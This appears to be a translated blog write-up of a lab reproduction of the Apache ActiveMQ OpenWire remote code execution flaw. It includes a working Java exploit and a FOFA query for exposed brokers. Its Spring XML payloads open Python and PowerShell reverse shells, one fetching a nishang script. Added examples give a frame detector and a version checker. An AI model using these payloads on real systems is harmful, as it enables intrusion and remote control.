Apache ActiveMQ remote code execution (RCE) vulnerability reproduction (CNVD-2023-69477)

This vulnerability was disclosed last week, so it is a good time to reproduce it and record the process.

1. Vulnerability description

A remote code execution vulnerability exists in Apache ActiveMQ. A remote attacker with access to the Apache ActiveMQ server TCP port (default is 61616) can execute arbitrary code by sending malicious data to the server.

Affected versions

Apache ActiveMQ < 5.18.3

Apache ActiveMQ < 5.17.6

Apache ActiveMQ < 5.16.7

Apache ActiveMQ < 5.15.16

FOFA query:

```
app="APACHE-ActiveMQ" && port="61616"
```

2. Environment setup

Here I reproduced it locally, using Kali and Windows 10.

Install ActiveMQ

Visit https://activemq.apache.org/ and download any vulnerable version.

I downloaded apache-activemq-5.15.10 here.

Unzip it, enter the bin directory, and run:

```shell
activemq start   # start the broker
```

Visit http://127.0.0.1:8161 and you can see that the environment started successfully.


3. Vulnerability reproduction

Download the exploit from: https://github.com/sincere9/Apache-ActiveMQ-RCE/tree/main/exp

After downloading, enter the exp folder, open ActiveMQ.java, and change the IP addresses to your own (here win10 is 192.168.2.129 and kali is 192.168.2.131):

```java
import java.io.*;
import java.net.Socket;

public class ActiveMQ {
    public static void main(final String[] args) throws Exception {
        System.out.println("[*] Poc for ActiveMQ openwire protocol rce");
        String ip = "192.168.2.129";
        int port = 61616;
        String pocxml= "http://192.168.2.131:8000/poc.xml";
        Socket sck = new Socket(ip, port);
        OutputStream os = sck.getOutputStream();
        DataOutputStream out = new DataOutputStream(os);
        out.writeInt(0); // size prefix, value doesn't matter
        out.writeByte(31); // dataType ExceptionResponseMarshaller
        out.writeInt(1); // CommandId
        out.writeBoolean(true); // ResponseRequired
        out.writeInt(1); // CorrelationId
        out.writeBoolean(true);
        // true -> a UTF-8 string follows
        out.writeBoolean(true);
        out.writeUTF("org.springframework.context.support.ClassPathXmlApplicationContext");
        // true -> a UTF-8 string follows
        out.writeBoolean(true);
        out.writeUTF(pocxml);
        // org.apache.activemq.openwire.v1.BaseDataStreamMarshaller#createThrowable is called, causing the rce
        out.close();
        os.close();
        sck.close();
        System.out.println("[*] Target\t" + ip + ":" + port);
        System.out.println("[*] XML address\t" + pocxml);
        System.out.println("[*] Payload send success.");
    }
}
```
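The field order the PoC above writes (length prefix, type 31, command id, response-required flag, correlation id, then a boolean-prefixed class name and message) is exactly what a broker-side or network-side detector has to decode. The following is an added example, not code from the original post or from the exploit repository: a small Python parser for that loose-encoded ExceptionResponse layout, plus a classifier that flags frames whose "throwable" class name does not look like a Throwable at all. The suffix heuristic (`Exception`, `Error`, `Throwable`) and the URL check are my own assumptions for the example; the real fix in the patched releases checks `Throwable` assignability at deserialization time instead. The two sample frames are constructed in the block, with the second one carrying the same class name and XML URL used in the post.

```python
"""Constructed example: classify OpenWire ExceptionResponse frames by the
throwable class name they carry. Not part of the original post."""
import struct

EXCEPTION_RESPONSE = 31          # OpenWire data type id written by the PoC (writeByte(31))
THROWABLE_SUFFIXES = ("Exception", "Error", "Throwable")  # heuristic only (assumption)


class FrameError(ValueError):
    """Raised when the bytes do not form a complete ExceptionResponse."""


class _Reader:
    """Minimal java.io.DataInputStream-style reader over a bytes object."""

    def __init__(self, data):
        self.data = data
        self.pos = 0

    def _take(self, n):
        if self.pos + n > len(self.data):
            raise FrameError("truncated frame")
        chunk = self.data[self.pos:self.pos + n]
        self.pos += n
        return chunk

    def int32(self):
        return struct.unpack(">i", self._take(4))[0]

    def boolean(self):
        return self._take(1)[0] != 0

    def utf(self):
        # DataOutputStream.writeUTF: 2-byte big-endian length, then (modified) UTF-8
        length = struct.unpack(">H", self._take(2))[0]
        return self._take(length).decode("utf-8")


def parse_exception_response(frame):
    """Decode the loose-encoded ExceptionResponse layout the PoC sends."""
    r = _Reader(frame)
    size = r.int32()                       # length prefix; the PoC writes 0 here
    data_type = r._take(1)[0]
    if data_type != EXCEPTION_RESPONSE:
        raise FrameError("not an ExceptionResponse (type %d)" % data_type)
    info = {
        "size": size,
        "command_id": r.int32(),
        "response_required": r.boolean(),
        "correlation_id": r.int32(),
        "class_name": None,
        "message": None,
    }
    if r.boolean():                        # exception present
        if r.boolean():                    # class name present
            info["class_name"] = r.utf()
        if r.boolean():                    # message present
            info["message"] = r.utf()
    return info


def classify(frame):
    """Return (verdict, reason) with verdict one of 'alert', 'benign', 'ignore'."""
    try:
        info = parse_exception_response(frame)
    except FrameError as exc:
        return ("ignore", str(exc))
    cls = info["class_name"]
    if cls is None:
        return ("benign", "no exception class in frame")
    if cls.endswith(THROWABLE_SUFFIXES):
        return ("benign", "class name looks like a Throwable: " + cls)
    reason = "non-Throwable class in ExceptionResponse: " + cls
    msg = info["message"] or ""
    if msg.startswith(("http://", "https://")):
        reason += " with URL-like message " + msg
    return ("alert", reason)


def _frame(class_name, message):
    """Build a constructed test frame in the same field order the PoC writes."""
    def utf(s):
        b = s.encode("utf-8")
        return struct.pack(">H", len(b)) + b
    return (struct.pack(">i", 0) + bytes([EXCEPTION_RESPONSE])
            + struct.pack(">i", 1) + b"\x01" + struct.pack(">i", 1)
            + b"\x01" + b"\x01" + utf(class_name) + b"\x01" + utf(message))


# Constructed samples: an ordinary error response, and one matching the post's PoC
BENIGN_FRAME = _frame("java.lang.SecurityException", "User name or password is invalid.")
POC_FRAME = _frame("org.springframework.context.support.ClassPathXmlApplicationContext",
                   "http://192.168.2.131:8000/poc.xml")

if __name__ == "__main__":
    for name, frame in (("benign", BENIGN_FRAME), ("poc", POC_FRAME)):
        print(name, classify(frame))
```

The parser only understands the loose encoding that the PoC uses before any WireFormatInfo negotiation; a real capture from a client that has negotiated tight encoding would need a different decoder, and a production detector should key on the class name rather than on the size prefix, since the PoC simply writes 0 there.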

Then modify the xml file:

```xml
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>python</value>
        <value>-c</value>
        <value><![CDATA[import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("niubi.com",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>
```

Then run the commands:

```shell
python3 -m http.server 8000   # start the HTTP server serving poc.xml
nc -lvvp 9999                 # listen on the callback port
javac ActiveMQ.java           # compile
java ActiveMQ                 # run
```

However, although poc.xml was indeed fetched, no reverse shell came back.

So I tried pinging a DNSlog domain instead. Modify the xml:

```xml
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>ping</value>
        <value>t1298j.dnslog.cn</value>
      </list>
    </constructor-arg>
  </bean>
</beans>
```

The DNSlog platform does record the query, proving that the command was executed.

So I looked for a way to get the reverse shell working. I figured the reverse-shell command might need to be different on Windows, so I used PowerShell for it instead.

Modify the poc.xml file:

```xml
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">

    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>powershell</value>
                <value>-c</value>
                <value><![CDATA[IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.2.131 -Port 23333]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>
```

Start the listener and run the exploit again.

The reverse shell connects back successfully.

PS: The shell did not come back at first. I went into \apache-activemq-5.15.10\data, checked activemq.log, and found that the connection was being terminated.

So I turned off the Windows 10 firewall, Defender, and so on, enabled debug logging with log4j.logger.org.apache.activemq=DEBUG, and worked through the problem from the logs. Only then did the reverse shell succeed.

4. Bug fix

The vendor has fixed this vulnerability by restricting the deserialized class to subclasses of Throwable. Affected users are advised to update to:

Apache ActiveMQ >= 5.18.3
Apache ActiveMQ >= 5.17.6
Apache ActiveMQ >= 5.16.7
Apache ActiveMQ >= 5.15.16
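The fixed releases are per maintained branch, so a naive "is it older than 5.18.3?" comparison misflags 5.16.7 and 5.17.6 as vulnerable and, worse, a naive "is it older than 5.15.16?" comparison misses 5.16.0 through 5.18.2. Below is an added example, not code from the original post, that applies the post's four ranges correctly; the version strings it parses are constructed sample input.

```python
"""Constructed example: branch-aware version check for the affected ranges
listed in the post. Not part of the original post."""
import re

# First patched release on each maintained branch, per the post's affected-version list
BRANCH_FIXES = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}
LATEST_FIX = (5, 18, 3)


def parse_version(text):
    """Extract major.minor.patch from strings such as '5.15.10' or 'apache-activemq-5.16.7'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no x.y.z version in %r" % text)
    return tuple(int(g) for g in m.groups())


def is_vulnerable(text):
    """True when the version falls inside one of the advisory's '<' ranges."""
    major, minor, patch = parse_version(text)
    fix = BRANCH_FIXES.get((major, minor))
    if fix is not None:
        # Same branch as a patched release: compare the patch level only
        return (major, minor, patch) < fix
    # No branch-specific fix: anything older than 5.15.16 is covered by '< 5.15.16';
    # anything newer than the 5.18 line already carries the fix
    return (major, minor, patch) < (5, 15, 16)


def naive_is_vulnerable(text):
    """The common mistake: compare against the newest fixed release only."""
    return parse_version(text) < LATEST_FIX


if __name__ == "__main__":
    for v in ("5.15.10", "5.15.16", "5.16.7", "5.17.5", "5.18.2", "6.0.0"):
        verdict = "vulnerable" if is_vulnerable(v) else "fixed"
        naive = " (naive check says vulnerable)" if naive_is_vulnerable(v) else ""
        print(v, verdict + naive)
```

Feed `is_vulnerable` the version string from a banner, package name or build-info file; the regex tolerates prefixes such as `apache-activemq-`.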

Source: blog.csdn.net/huangyongkang666/article/details/134138471